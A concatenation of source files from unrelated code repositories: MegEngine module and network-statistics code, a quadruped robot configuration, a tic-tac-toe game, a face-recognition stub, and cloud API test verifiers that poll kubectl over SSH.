for hook in self._forward_hooks.values():
modified_outputs = hook(self, inputs, outputs)
if modified_outputs is not None:
outputs = modified_outputs
return outputs
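# Usage sketch (hypothetical module instance `net`): a pre-hook that scales the
# inputs and a forward hook that inspects the outputs; either can be detached via
# the returned handler.
#
#   handler = net.register_forward_pre_hook(
#       lambda module, inputs: tuple(i * 2 for i in inputs))
#   net.register_forward_hook(
#       lambda module, inputs, outputs: print(outputs))
#   handler.remove()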
def _flatten(
self,
*,
recursive: bool = True,
with_key: bool = False,
with_parent: bool = False,
prefix: Optional[str] = None,
predicate: Callable[[Any], bool] = lambda _: True,
seen: Optional[Set[int]] = None
) -> Union[Iterable[Any], Iterable[Tuple[str, Any]]]:
"""Scans the module object and returns an iterable for the :class:`~.Tensor`
and :class:`~.Module` attributes that agree with the ``predicate``. For multiple
calls of this function with same arguments, the order of objects within the
returned iterable is guaranteed to be identical, as long as all the involved
module objects' ``__dict__`` does not change throughout those calls.
:param recursive: Whether to recursively scan all the submodules.
:param with_key: Whether to yield keys along with yielded objects.
:param with_parent: Whether to yield ``self`` along with yielded objects.
:param prefix: The prefix appended to the yielded keys.
:param predicate: The predicate function applied to scanned objects.
:param seen: A set of object ids recording which modules have already been traversed.
"""
if seen is None:
seen = set([id(self)])
module_dict = vars(self)
_prefix = "" if prefix is None else prefix + "."
for key in sorted(module_dict):
for expanded_key, leaf in _expand_structure(key, module_dict[key]):
leaf_id = id(leaf)
if leaf_id in seen:
continue
seen.add(leaf_id)
if predicate(leaf):
if with_key and with_parent:
yield _prefix + expanded_key, leaf, self
elif with_key:
yield _prefix + expanded_key, leaf
elif with_parent:
yield leaf, self
else:
yield leaf
if recursive and isinstance(leaf, Module):
yield from leaf._flatten(
recursive=recursive,
with_key=with_key,
with_parent=with_parent,
prefix=_prefix + expanded_key if with_key else None,
predicate=predicate,
seen=seen,
)
def parameters(
self, requires_grad: Optional[bool] = None, recursive: bool = True, **kwargs
) -> Iterable[Parameter]:
r"""Returns an iterable for the :class:`~.Parameter` of the module.
:param requires_grad: Limitation over the :attr:`~.Parameter.requires_grad`
attribute of returned :class:`.Parameter`. ``None`` for no limitation.
:param recursive: If ``True``, returns all :class:`~.Parameter` within this
module, else only returns :class:`~.Parameter` that are direct attributes
of this module.
"""
def predicate(obj) -> bool:
return _is_parameter(obj) and (
requires_grad is None or obj.requires_grad == requires_grad
)
yield from self._flatten(
with_key=False, predicate=predicate, recursive=recursive, **kwargs
)
def named_parameters(
self,
requires_grad: Optional[bool] = None,
prefix: Optional[str] = None,
recursive: bool = True,
**kwargs
) -> Iterable[Tuple[str, Parameter]]:
"""Returns an iterable for key :class:`~.Parameter` pairs of the module, where
``key`` is the dotted path from this module to the :class:`~.Parameter` .
:param requires_grad: Limitation over the :attr:`~.Parameter.requires_grad`
attribute of returned :class:`~.Parameter` . ``None`` for no limitation.
:param prefix: The prefix prepended to the keys.
:param recursive: If ``True``, returns all :class:`~.Parameter` within this
module, else only returns :class:`~.Parameter` that are direct attributes
of this module.
"""
def predicate(obj) -> bool:
return _is_parameter(obj) and (
requires_grad is None or obj.requires_grad == requires_grad
)
yield from self._flatten(
with_key=True,
prefix=prefix,
predicate=predicate,
recursive=recursive,
**kwargs,
)
def buffers(self, recursive: bool = True, **kwargs) -> Iterable[Buffer]:
"""Returns an iterable for the :class:`~.Buffer` of the module.
:param recursive: If ``True``, returns all :class:`~.Buffer` within this
module, else only returns :class:`~.Buffer` that are direct attributes
of this module.
"""
yield from self._flatten(
with_key=False, predicate=_is_buffer, recursive=recursive, **kwargs
)
def named_buffers(
self, prefix: Optional[str] = None, recursive: bool = True, **kwargs
) -> Iterable[Tuple[str, Buffer]]:
"""Returns an iterable for key :class:`~.Buffer` pairs of the module, where
``key`` is the dotted path from this module to the :class:`~.Buffer` .
:param prefix: The prefix prepended to the keys.
:param recursive: If ``True``, returns all :class:`~.Buffer` within this
module, else only returns :class:`~.Buffer` that are direct attributes
of this module.
"""
yield from self._flatten(
with_key=True,
prefix=prefix,
predicate=_is_buffer,
recursive=recursive,
**kwargs,
)
def children(self, **kwargs) -> "Iterable[Module]":
"""Returns an iterable for all the submodules that are direct attributes of this
module.
"""
yield from self._flatten(
with_key=False, predicate=_is_module, recursive=False, **kwargs
)
def named_children(self, **kwargs) -> "Iterable[Tuple[str, Module]]":
"""Returns an iterable of key-submodule pairs for all the submodules that are
direct attributes of this module, where 'key' is the attribute name of
submodules.
"""
yield from self._flatten(
with_key=True, predicate=_is_module, recursive=False, **kwargs
)
def modules(self, **kwargs) -> "Iterable[Module]":
"""Returns an iterable for all the modules within this module, including itself.
"""
if "with_parent" in kwargs and kwargs["with_parent"]:
yield self, None
else:
yield self
yield from self._flatten(with_key=False, predicate=_is_module, **kwargs)
def named_modules(
self, prefix: Optional[str] = None, **kwargs
) -> "Iterable[Tuple[str, Module]]":
"""Returns an iterable of key-module pairs for all the modules within this
module, including itself, where 'key' is the dotted path from this module to the
submodules.
:param prefix: The prefix prepended to the path.
"""
if "with_parent" in kwargs and kwargs["with_parent"]:
yield ("" if prefix is None else prefix), self, None
else:
yield ("" if prefix is None else prefix), self
yield from self._flatten(
with_key=True, prefix=prefix, predicate=_is_module, **kwargs
)
def apply(self, fn: "Callable[[Module], Any]") -> None:
"""Apply function ``fn`` to all the modules within this module, including
itself.
:param fn: The function to be applied on modules.
"""
for it in self.modules():
fn(it)
def zero_grad(self) -> None:
"""Set all parameters' grads to zero
"""
for param in self.parameters():
if param.grad is not None:
param.grad.reset_zero()
def train(self, mode: bool = True, recursive: bool = True) -> None:
"""Set training mode of all the modules within this module (including itself) to
``mode``. This effectively sets the ``training`` attributes of those modules
to ``mode``, but only has effect on certain modules (e.g.
:class:`~.BatchNorm2d`, :class:`~.Dropout`, :class:`~.Observer`)
:param mode: the training mode to be set on modules.
:param recursive: whether to recursively call submodules' ``train()``.
"""
if not recursive:
self.training = mode
return
def fn(module: Module) -> None:
module.train(mode, recursive=False)
self.apply(fn)
def eval(self) -> None:
"""Set training mode of all the modules within this module (including itself) to
``False``. See :meth:`~.Module.train` for details.
"""
self.train(False)
def disable_quantize(self, value=True):
r"""
Set ``module``'s ``quantize_disabled`` attribute and return ``module``.
Could be used as a decorator.
"""
def fn(module: Module) -> None:
module.quantize_disabled = value
self.apply(fn)
def replace_param(
self, params: dict, start_pos: int, seen: Optional[Set[int]] = None
):
"""Replace module's parameters with `params`, used by :class:`~.ParamPack` to
speed up multi-machine training.
"""
offset = 0
if seen is None:
seen = set([id(self)])
module_dict = vars(self)
for key in sorted(module_dict):
hash_id = id(module_dict[key])
if hash_id in seen:
continue
seen.add(hash_id)
if isinstance(module_dict[key], Parameter):
if start_pos + offset in params:
assert module_dict[key].shape == params[start_pos + offset].shape
module_dict[key] = params[start_pos + offset]
offset += 1
if isinstance(module_dict[key], Module):
offset += module_dict[key].replace_param(
params, start_pos + offset, seen
)
return offset
def state_dict(self, rst=None, prefix="", keep_var=False):
r"""Returns a dictionary containing whole states of the module.
"""
def is_state(obj):
return _is_parameter(obj) or _is_buffer(obj)
if rst is None:
rst = OrderedDict()
for k, v in self._flatten(recursive=False, with_key=True, predicate=is_state):
assert prefix + k not in rst, "duplicated state: {}".format(k)
if keep_var:
rst[prefix + k] = v
else:
rst[prefix + k] = v.numpy()
for k, submodule in self._flatten(
recursive=False,
with_key=True,
predicate=lambda obj: isinstance(obj, Module),
):
submodule.state_dict(rst, prefix + k + ".", keep_var)
return rst
def load_state_dict(
self,
state_dict: Union[dict, Callable[[str, Tensor], Optional[np.ndarray]]],
strict=True,
):
r"""Load a given dictionary created by :func:`state_dict` into this module.
If ``strict`` is ``True``, the keys of :func:`state_dict` must exactly match the keys
returned by :func:`state_dict`.
Users can also pass a closure: `Function[key: str, var: Tensor] -> Optional[np.ndarray]`
as a `state_dict`, in order to handle complex situations. For example, load everything
except for the final linear classifier:
.. code-block::
state_dict = {...} # Dict[str, np.ndarray]
model.load_state_dict({
k: None if k.startswith('fc') else v
for k, v in state_dict.items()
}, strict=False)
Here returning `None` means skipping parameter `k`.
To prevent shape mismatch (e.g. load PyTorch weights), we can reshape before loading:
.. code-block::
state_dict = {...}
def reshape_accordingly(k, v):
return state_dict[k].reshape(v.shape)
model.load_state_dict(reshape_accordingly)
We can also perform inplace re-initialization or pruning:
.. code-block::
def reinit_and_pruning(k, v):
if 'bias' in k:
M.init.zero_(v)
if 'conv' in k:
return v.numpy() * (np.abs(v.numpy()) > 1e-3).astype("float32")
model.load_state_dict(reinit_and_pruning, strict=False)
"""
unused = []
if isinstance(state_dict, dict):
unused = state_dict.keys()
def closure(k, _): # var unused
return state_dict[k] if k in state_dict else None
elif callable(state_dict):
closure = state_dict
else:
raise ValueError(
"`state_dict` must load a dict or callable, got {}".format(
type(state_dict)
)
)
loaded, skipped = self._load_state_dict_with_closure(closure)
unused = set(unused) - loaded
if len(unused) != 0:
if strict:
raise KeyError(
"Unused params violate `strict=True`, unused={}".format(unused)
)
else:
logger.warning(
"Unused params in `strict=False` mode, unused={}".format(unused)
)
if len(skipped) != 0:
if strict:
raise KeyError(
"Missing params violate `strict=True`, missing={}".format(skipped)
)
else:
logger.warning(
"Missing params in `strict=False` mode, missing={}".format(skipped)
)
def _load_state_dict_with_closure(self, closure):
"""Advance state_dict load through callable `closure` whose signature is
`closure(key: str, var: Tensor) -> Union[np.ndarray, None]`
"""
assert callable(closure), "closure must be a function"
loaded = []
skipped = []
local_state_dict = self.state_dict(keep_var=True)
for k, var in local_state_dict.items():
to_be_load = closure(k, var)
if to_be_load is None:
skipped.append(k)
continue
assert isinstance(
to_be_load, np.ndarray
), "closure should return a `np.ndarray`, now `{}` get {}".format(
k, to_be_load
)
assert (
var.shape == to_be_load.shape
), "param `{}` shape mismatch, should be {}, get {}".format(
k, var.shape, to_be_load.shape
)
# For quantized dtype, the initialized dtype
# scale/zero_points maybe invalid, use pretrained dtype instead.
if is_quantize(to_be_load.dtype) and is_quantize(var.dtype):
var.dtype = to_be_load.dtype
var.set_value(to_be_load)
loaded.append(k)
return set(loaded), set(skipped)
```
#### File: megengine/utils/net_stats.py
```python
from functools import partial
import numpy as np
import tabulate
import megengine as mge
import megengine._internal as mgb
import megengine.module as m
import megengine.module.qat as qatm
import megengine.module.quantized as qm
try:
mge.logger.MegEngineLogFormatter.max_lines = float("inf")
except AttributeError as e:
raise ValueError("set logger max lines failed")
logger = mge.get_logger(__name__)
CALC_FLOPS = {}
def _register_modules(*modules):
def callback(impl):
for module in modules:
CALC_FLOPS[module] = impl
return impl
return callback
@_register_modules(
m.Conv2d,
m.ConvTranspose2d,
m.LocalConv2d,
qm.Conv2d,
qm.ConvRelu2d,
qm.ConvBn2d,
qm.ConvBnRelu2d,
qatm.Conv2d,
qatm.ConvRelu2d,
qatm.ConvBn2d,
qatm.ConvBnRelu2d,
)
def count_convNd(module, input, output):
bias = 1 if module.bias is not None else 0
group = module.groups
ic = input[0].shape[1]
oc = output[0].shape[1]
goc = oc // group
gic = ic // group
N = output[0].shape[0]
HW = np.prod(output[0].shape[2:])
# N x Cout x H x W x (Cin x Kw x Kh + bias)
return N * HW * goc * (gic * np.prod(module.kernel_size) + bias)
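# Worked example (hypothetical layer): a 3x3 Conv2d with ic=64, oc=128, groups=1,
# bias, and a 1x128x56x56 output gives
#   N * HW * goc * (gic * Kh * Kw + 1) = 1 * 3136 * 128 * (64 * 9 + 1) ≈ 2.32e8
# operations as counted by this function.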
@_register_modules(m.ConvTranspose2d)
def count_deconvNd(module, input, output):
return np.prod(input[0].shape) * output[0].shape[1] * np.prod(module.kernel_size)
@_register_modules(m.Linear, qatm.Linear, qm.Linear)
def count_linear(module, input, output):
return np.prod(output[0].shape) * module.in_features
# no need to list the qat and quantized modules separately since they inherit from the float modules.
hook_modules = (
m.Conv2d,
m.ConvTranspose2d,
m.LocalConv2d,
m.BatchNorm2d,
m.Linear,
)
def net_stats(model, input_size, bar_length_max=20, log_params=True, log_flops=True):
def dict2table(list_of_dict, header):
table_data = [header]
for d in list_of_dict:
row = []
for h in header:
v = ""
if h in d:
v = d[h]
row.append(v)
table_data.append(row)
return table_data
def sizeof_fmt(num, suffix="B"):
for unit in ["", "Ki", "Mi", "Gi", "Ti", "Pi", "Ei", "Zi"]:
if abs(num) < 1024.0:
return "{:3.3f} {}{}".format(num, unit, suffix)
num /= 1024.0
sign_str = "-" if num < 0 else ""
return "{}{:.1f} {}{}".format(sign_str, num, "Yi", suffix)
def get_byteswidth(tensor):
dtype = tensor.dtype
if mgb.dtype.is_quantize(dtype):
return 1
elif mgb.dtype.is_bfloat16(dtype):
return 2
else:
return 4
def print_flops_stats(flops):
flops_list = [i["flops_num"] for i in flops]
max_flops_num = max(flops_list + [0])
# calc total flops and set flops_cum
total_flops_num = 0
for d in flops:
total_flops_num += int(d["flops_num"])
d["flops_cum"] = sizeof_fmt(total_flops_num, suffix="OPs")
for i in flops:
f = i["flops_num"]
i["flops"] = sizeof_fmt(f, suffix="OPs")
r = i["ratio"] = f / total_flops_num
i["percentage"] = "{:.2f}%".format(r * 100)
bar_length = int(f / max_flops_num * bar_length_max)
i["bar"] = "#" * bar_length
header = [
"name",
"class_name",
"input_shapes",
"output_shapes",
"flops",
"flops_cum",
"percentage",
"bar",
]
total_flops_str = sizeof_fmt(total_flops_num, suffix="OPs")
total_var_size = sum(sum(s[1] for s in i["output_shapes"]) for i in flops)
flops.append(
dict(name="total", flops=total_flops_str, output_shapes=total_var_size)
)
logger.info(
"flops stats: \n" + tabulate.tabulate(dict2table(flops, header=header))
)
return total_flops_num
def print_params_stats(params):
total_param_dims, total_param_size = 0, 0
for d in params:
total_param_dims += int(d["param_dim"])
total_param_size += int(d["size"])
d["size"] = sizeof_fmt(d["size"])
d["size_cum"] = sizeof_fmt(total_param_size)
for d in params:
ratio = d["param_dim"] / total_param_dims
d["ratio"] = ratio
d["percentage"] = "{:.2f}%".format(ratio * 100)
# construct bar
max_ratio = max([d["ratio"] for d in params])
for d in params:
bar_length = int(d["ratio"] / max_ratio * bar_length_max)
d["size_bar"] = "#" * bar_length
param_size = sizeof_fmt(total_param_size)
params.append(dict(name="total", param_dim=total_param_dims, size=param_size,))
header = [
"name",
"shape",
"mean",
"std",
"param_dim",
"bits",
"size",
"size_cum",
"percentage",
"size_bar",
]
logger.info(
"param stats: \n" + tabulate.tabulate(dict2table(params, header=header))
)
return total_param_size
def net_stats_hook(module, input, output, name=""):
class_name = str(module.__class__).split(".")[-1].split("'")[0]
flops_fun = CALC_FLOPS.get(type(module))
if callable(flops_fun):
flops_num = flops_fun(module, input, output)
if not isinstance(output, (list, tuple)):
output = [output]
flops.append(
dict(
name=name,
class_name=class_name,
input_shapes=[i.shape for i in input],
output_shapes=[o.shape for o in output],
flops_num=flops_num,
flops_cum=0,
)
)
if hasattr(module, "weight") and module.weight is not None:
w = module.weight
value = w.numpy()
param_dim = np.prod(w.shape)
param_bytes = get_byteswidth(w)
params.append(
dict(
name=name + "-w",
shape=w.shape,
param_dim=param_dim,
bits=param_bytes * 8,
size=param_dim * param_bytes,
size_cum=0,
mean="{:.2g}".format(value.mean()),
std="{:.2g}".format(value.std()),
)
)
if hasattr(module, "bias") and module.bias is not None:
b = module.bias
value = b.numpy()
param_dim = np.prod(b.shape)
param_bytes = get_byteswidth(b)
params.append(
dict(
name=name + "-b",
shape=b.shape,
param_dim=param_dim,
bits=param_bytes * 8,
size=param_dim * param_bytes,
size_cum=0,
mean="{:.2g}".format(value.mean()),
std="{:.2g}".format(value.std()),
)
)
# multiple inputs to the network
if not isinstance(input_size[0], tuple):
input_size = [input_size]
params = []
flops = []
hooks = []
for (name, module) in model.named_modules():
if isinstance(module, hook_modules):
hooks.append(
module.register_forward_hook(partial(net_stats_hook, name=name))
)
inputs = [mge.zeros(in_size, dtype=np.float32) for in_size in input_size]
model.eval()
model(*inputs)
for h in hooks:
h.remove()
total_flops, total_params = 0, 0
if log_params:
total_params = print_params_stats(params)
if log_flops:
total_flops = print_flops_stats(flops)
return total_params, total_flops
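# Usage sketch (hypothetical model and input size):
#   total_params, total_flops = net_stats(model, (1, 3, 224, 224))
# logs per-layer parameter and FLOP tables and returns the totals (bytes / OPs).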
``` |
{
"source": "13221325403/StanfordQuadruped",
"score": 3
} |
#### File: StanfordQuadruped/pupper/Config.py
```python
import numpy as np
from pupper.ServoCalibration import MICROS_PER_RAD, NEUTRAL_ANGLE_DEGREES
from pupper.HardwareConfig import PS4_COLOR, PS4_DEACTIVATED_COLOR
from enum import Enum
# TODO: put these somewhere else
class PWMParams:
def __init__(self):
self.pins = np.array([[2, 14, 18, 23], [3, 15, 27, 24], [4, 17, 22, 25]])
self.range = 4000
self.freq = 250
class ServoParams:
def __init__(self):
self.neutral_position_pwm = 1500 # Middle position
self.micros_per_rad = MICROS_PER_RAD # Must be calibrated
# The neutral angle of the joint relative to the modeled zero-angle in degrees, for each joint
self.neutral_angle_degrees = NEUTRAL_ANGLE_DEGREES
self.servo_multipliers = np.array(
[[1, 1, 1, 1], [-1, 1, -1, 1], [1, -1, 1, -1]]
)
@property
def neutral_angles(self):
return self.neutral_angle_degrees * np.pi / 180.0 # Convert to radians
class Configuration:
def __init__(self):
################# CONTROLLER BASE COLOR ##############
self.ps4_color = PS4_COLOR
self.ps4_deactivated_color = PS4_DEACTIVATED_COLOR
#################### COMMANDS ####################
self.max_x_velocity = 0.4
self.max_y_velocity = 0.3
self.max_yaw_rate = 2.0
self.max_pitch = 30.0 * np.pi / 180.0
#################### MOVEMENT PARAMS ####################
self.z_time_constant = 0.02
self.z_speed = 0.03 # maximum speed [m/s]
self.pitch_deadband = 0.02
self.pitch_time_constant = 0.25
self.max_pitch_rate = 0.15
self.roll_speed = 0.16 # maximum roll rate [rad/s]
self.yaw_time_constant = 0.3
self.max_stance_yaw = 1.2
self.max_stance_yaw_rate = 2.0
#################### STANCE ####################
self.delta_x = 0.1
self.delta_y = 0.09
self.x_shift = 0.0
self.default_z_ref = -0.16
#################### SWING ######################
self.z_coeffs = None
self.z_clearance = 0.07
self.alpha = (
0.5 # Ratio between touchdown distance and total horizontal stance movement
)
self.beta = (
0.5 # Ratio between touchdown distance and total horizontal stance movement
)
#################### GAIT #######################
self.dt = 0.01
self.num_phases = 4
self.contact_phases = np.array(
[[1, 1, 1, 0], [1, 0, 1, 1], [1, 0, 1, 1], [1, 1, 1, 0]]
)
self.overlap_time = (
0.10 # duration of the phase where all four feet are on the ground
)
self.swing_time = (
0.15 # duration of the phase when only two feet are on the ground
)
######################## GEOMETRY ######################
self.LEG_FB = 0.10 # front-back distance from center line to leg axis
self.LEG_LR = 0.04 # left-right distance from center line to leg plane
self.LEG_L2 = 0.115
self.LEG_L1 = 0.1235
self.ABDUCTION_OFFSET = 0.03 # distance from abduction axis to leg
self.FOOT_RADIUS = 0.01
self.HIP_L = 0.0394
self.HIP_W = 0.0744
self.HIP_T = 0.0214
self.HIP_OFFSET = 0.0132
self.L = 0.276
self.W = 0.100
self.T = 0.050
self.LEG_ORIGINS = np.array(
[
[self.LEG_FB, self.LEG_FB, -self.LEG_FB, -self.LEG_FB],
[-self.LEG_LR, self.LEG_LR, -self.LEG_LR, self.LEG_LR],
[0, 0, 0, 0],
]
)
self.ABDUCTION_OFFSETS = np.array(
[
-self.ABDUCTION_OFFSET,
self.ABDUCTION_OFFSET,
-self.ABDUCTION_OFFSET,
self.ABDUCTION_OFFSET,
]
)
################### INERTIAL ####################
self.FRAME_MASS = 0.560 # kg
self.MODULE_MASS = 0.080 # kg
self.LEG_MASS = 0.030 # kg
self.MASS = self.FRAME_MASS + (self.MODULE_MASS + self.LEG_MASS) * 4
# Compensation factor of 3 because the inertia measurement was just
# of the carbon fiber and plastic parts of the frame and did not
# include the hip servos and electronics
self.FRAME_INERTIA = tuple(
map(lambda x: 3.0 * x, (1.844e-4, 1.254e-3, 1.337e-3))
)
self.MODULE_INERTIA = (3.698e-5, 7.127e-6, 4.075e-5)
leg_z = 1e-6
leg_mass = 0.010
leg_x = 1 / 12 * self.LEG_L1 ** 2 * leg_mass
leg_y = leg_x
self.LEG_INERTIA = (leg_x, leg_y, leg_z)
@property
def default_stance(self):
return np.array(
[
[
self.delta_x + self.x_shift,
self.delta_x + self.x_shift,
-self.delta_x + self.x_shift,
-self.delta_x + self.x_shift,
],
[-self.delta_y, self.delta_y, -self.delta_y, self.delta_y],
[0, 0, 0, 0],
]
)
################## SWING ###########################
@property
def z_clearance(self):
return self.__z_clearance
@z_clearance.setter
def z_clearance(self, z):
self.__z_clearance = z
# b_z = np.array([0, 0, 0, 0, self.__z_clearance])
# A_z = np.array(
# [
# [0, 0, 0, 0, 1],
# [1, 1, 1, 1, 1],
# [0, 0, 0, 1, 0],
# [4, 3, 2, 1, 0],
# [0.5 ** 4, 0.5 ** 3, 0.5 ** 2, 0.5 ** 1, 0.5 ** 0],
# ]
# )
# self.z_coeffs = solve(A_z, b_z)
########################### GAIT ####################
@property
def overlap_ticks(self):
return int(self.overlap_time / self.dt)
@property
def swing_ticks(self):
return int(self.swing_time / self.dt)
@property
def stance_ticks(self):
return 2 * self.overlap_ticks + self.swing_ticks
@property
def phase_ticks(self):
return np.array(
[self.overlap_ticks, self.swing_ticks, self.overlap_ticks, self.swing_ticks]
)
@property
def phase_length(self):
return 2 * self.overlap_ticks + 2 * self.swing_ticks
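# Worked example with the defaults above: dt=0.01 s, overlap_time=0.10 s and
# swing_time=0.15 s give overlap_ticks=10, swing_ticks=15, stance_ticks=35 and
# phase_length = 2*10 + 2*15 = 50 ticks, i.e. a 0.5 s gait cycle.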
class SimulationConfig:
def __init__(self):
self.XML_IN = "pupper.xml"
self.XML_OUT = "pupper_out.xml"
self.START_HEIGHT = 0.3
self.MU = 1.5 # coeff friction
self.DT = 0.001 # seconds between simulation steps
self.JOINT_SOLREF = "0.001 1" # time constant and damping ratio for joints
self.JOINT_SOLIMP = "0.9 0.95 0.001" # joint constraint parameters
self.GEOM_SOLREF = "0.01 1" # time constant and damping ratio for geom contacts
self.GEOM_SOLIMP = "0.9 0.95 0.001" # geometry contact parameters
# Joint params
G = 220 # Servo gear ratio
m_rotor = 0.016 # Servo rotor mass
r_rotor = 0.005 # Rotor radius
self.ARMATURE = G ** 2 * m_rotor * r_rotor ** 2 # Inertia of rotational joints
# print("Servo armature", self.ARMATURE)
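# With G=220, m_rotor=0.016 kg and r_rotor=0.005 m this evaluates to
# 220**2 * 0.016 * 0.005**2 ≈ 0.0194 kg*m^2.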
NATURAL_DAMPING = 1.0 # Damping resulting from friction
ELECTRICAL_DAMPING = 0.049 # Damping resulting from back-EMF
self.REV_DAMPING = (
NATURAL_DAMPING + ELECTRICAL_DAMPING
) # Damping torque on the revolute joints
# Servo params
self.SERVO_REV_KP = 300 # Position gain [Nm/rad]
# Force limits
self.MAX_JOINT_TORQUE = 3.0
self.REVOLUTE_RANGE = 1.57
``` |
{
"source": "1323ED5/tic-tac-toe-AI",
"score": 3
} |
#### File: tic-tac-toe-AI/src/game.py
```python
from src.dimension import Dimension
from src.game_mechanic import GameMechanic
from src.turn import generate_turns
from src.utils import clear_console
class AIMixin:
def bot_turn(self):
turns = generate_turns(self.area)
root_dimension = Dimension(self.area, self.active_player)
calculations = root_dimension.born()
winnable_result = max(calculations)
index_of_max = calculations.index(winnable_result)
winnable_turn = turns[index_of_max]
cell_id = winnable_turn.cell_id
self.make_turn(cell_id)
class ConsoleGame(GameMechanic, AIMixin):
def display_area(self):
print()
print("", " | ".join(map(lambda x: " " if x is None else x, self.area[:3])))
print("-" * 11)
print("", " | ".join(map(lambda x: " " if x is None else x, self.area[3:6])))
print("-" * 11)
print("", " | ".join(map(lambda x: " " if x is None else x, self.area[6:9])))
print()
def player_turn(self):
cell_id = int(input("cell_id: "))
self.make_turn(cell_id)
def start(self):
while True:
clear_console()
self.display_area()
if self.active_player == 0:
self.player_turn()
else:
self.bot_turn()
gameover = self.check_game_over()
if gameover is not None:
print("WON:", {1: "AI", 0: "TIE", -1: "YOU"}.get(gameover))
self.display_area()
break
``` |
{
"source": "13240137000/Face",
"score": 4
} |
#### File: 13240137000/Face/compare.py
```python
import face_recognition
def main():
staffs = ['Jack', 'Wubo', 'Ding']
for staff in staffs:
print(staff)
# jack_image = face_recognition.load_image_file("images/jack.jpg")
# unknown_image = face_recognition.load_image_file("images/jack1.jpg")
#
# jack_encoding = face_recognition.face_encodings(jack_image)[0]
# unknown_encoding = face_recognition.face_encodings(unknown_image)[0]
#
# results = face_recognition.compare_faces([jack_encoding], unknown_encoding)
#
# labels = ['Jack']
#
# print('results:' + str(results))
#
# for i in range(0, len(results)):
# if results[i]:
# print('The person is:' + labels[i])
if __name__ == "__main__":
main()
``` |
{
"source": "13242084001/api",
"score": 3
} |
#### File: cloud-v2.0/verify/gol.py
```python
def _init():
global _global_dict
_global_dict = {}
def set_value(key, value):
_global_dict[key] = value
def get_value(key):
return _global_dict.get(key)
_init()
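# Usage sketch: the module keeps a process-wide dict, initialised at import time
# by the _init() call above, e.g. (hypothetical payload):
#   set_value("rows", [{"vmid": "demo"}])
#   get_value("rows")  # -> [{"vmid": "demo"}]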
```
#### File: cloud-v2.0/verify/verify.py
```python
from common import sshClient
import time
import eventlet
from .gol import *
import requests
from common.uploadMirror import login
from common.sqlquery import Query
#import pytest
import json
def check_login_response_headers(response):
result = False
if "cloud0" in response.headers.get("Set-Cookie"):
result = True
assert result == True
def logout_ok(response):
pass
def check_stop_py_machine(response):
#print(json.dumps(response.json()))
#print(response.json().get("code"), "yyyyyyyyyyyyyyy")
assert response.json().get("code") == 0
def check_add_role(response):
body_json = response.json()
assert body_json.get("code") == 1
assert body_json.get("error") == None
def check_remove_role(response):
body = response.json()
assert body.get("code") == 1
assert body.get("error") == None
# verify adding a zone
def check_add_zone(response):
body = response.json()
resourceIds = body.get("resourceIds")
#print(body)
assert body.get("code") == 1
#assert isinstance(resourceIds,list)
def check_query_zone(response):
body = response.json()
assert body.get("code") == 1
def check_query_cluster(response):
body = response.json()
print("####################################################")
assert body.get("code") == 1
assert isinstance(body.get("rows"), list)
# JSON body check, currently unused
def check_cluster_add(response):
body = response.json()
print(body)
def check_physicalmachine_query_ok(response):
body = response.json()
print(body)
assert body.get("code") == 1
#assert body.get("rows")
def check_physical_update_ok(response):
body = response.json()
print(body)
assert body.get("code") == 1
assert isinstance(body.get("resourceIds"), list)
def check_stop_start_pysicalmachine_ok(response):
body = response.json()
assert body.get("code") == 1
assert isinstance(body.get("resourceIds"), list)
# verify querying main storage
def check_mainStorage_query_ok(response):
body = response.json()
assert body.get("code") == 1
assert isinstance(body.get("rows"), list)
# verify updating main storage
def check_mainStorage_update_ok(response):
body = response.json()
assert body.get("code") == 1
assert isinstance(body.get("resourceIds"), list)
# verify querying the list of unattached clusters when adding a cluster to main storage
def check_query_clusterUnload_list_ok(response):
body = response.json()
assert body.get("code") == 1
assert isinstance(body.get("rows"), list)
# verify attaching a cluster to main storage
def check_mainStorage_addCluster_ok(response, clusterId, uri):
assert response.json().get('code') == 1
#print(response.json())
result = Query()('SELECT * FROM `cl_host_inf` WHERE CLUSTERID="{0}" AND STATE=1 AND DELETED=0'.format(clusterId))
#print(result)
#print(555555555555555555555555)
username = "root"
password = "<PASSWORD>"
ip = "172.16.130.254"
cmd = 'kubectl get vmp|grep "{0}"|wc -l'.format(uri)
flag = False
eventlet.monkey_patch()
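# Poll the vmp resources over SSH until the count matches the expected cluster
# hosts; eventlet.Timeout(180, False) makes the loop give up silently after 180 s
# instead of raising.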
with eventlet.Timeout(180, False):
while 1:
time.sleep(0.5)
ret = sshClient.tunction(ip=ip, username=username, password=password, cmd=cmd)
if int(ret) == len(result):
# print(1111)
flag = True
break
assert flag
def check_delete_mainStorage_ok(response, ids):
id_list = ids.split(",")
#result = Query()(
# 'SELECT COUNT(*) FROM `cl_host_inf` WHERE CLUSTERID="{0}" AND STATE=1 AND DELETED=0'.format(clusterid))
username = "root"
password = "<PASSWORD>"
ip = "172.16.130.254"
for id in id_list:
cmd = 'kubectl get vmp|grep "{0}"|wc -l'.format(id)
flag = False
eventlet.monkey_patch()
with eventlet.Timeout(180, False):
while 1:
time.sleep(0.5)
ret = sshClient.tunction(ip=ip, username=username, password=password, cmd=cmd)
try:
if not int(ret):
# print(1111)
flag = True
break
except Exception as e:
print(e)
flag = True
break
assert flag
def check_add_mirrorServer_ok(response):
print(response.json())
username = "root"
password = "<PASSWORD>"
ip = "172.16.130.254"
cmd = 'kubectl get vmp|grep vmdi|wc -l'
flag = False
eventlet.monkey_patch()
with eventlet.Timeout(180, False):
while 1:
time.sleep(0.5)
ret = sshClient.tunction(ip=ip, username=username, password=password, cmd=cmd)
if int(ret) > 1:
# print(1111)
flag = True
break
assert flag
# verify that the cloud host was added successfully
def check_cloudHost_add_ok(response):
body = response.json()
print(body)
assert body.get("code") == 1
id = body.get("id")
id_len = len(id.split(","))
id = id.replace(",", "|")
username = "root"
password = "<PASSWORD>"
ip = "172.16.130.254"
cmd = 'kubectl get vm|grep -E "{0}"|wc -l'.format(id)
flag = False
eventlet.monkey_patch()
with eventlet.Timeout(180, False):
while 1:
time.sleep(0.5)
ret = sshClient.tunction(ip=ip, username=username, password=password, cmd=cmd)
if int(ret) == id_len:
#print(1111)
flag = True
break
assert flag
# verify querying cloud hosts in the running state
def check_query_vm_status_ok(response, state):
#print("zheshi jjjjjj ", state)
verify_rows = get_value("rows")
num = 0
for row in verify_rows:
if row.get("state") == state:
num += 1
local_rows = response.json().get("rows")
for row in local_rows:
assert row.get("state") == state
continue
assert len(local_rows) == num
def check_query_vm_ok(response, keyword, searchtype):
searchtype_dict = {0: "name", 2: "hostip"}
verify_rows = get_value("rows")
#print(verify_rows,"f"*30)
num = 0
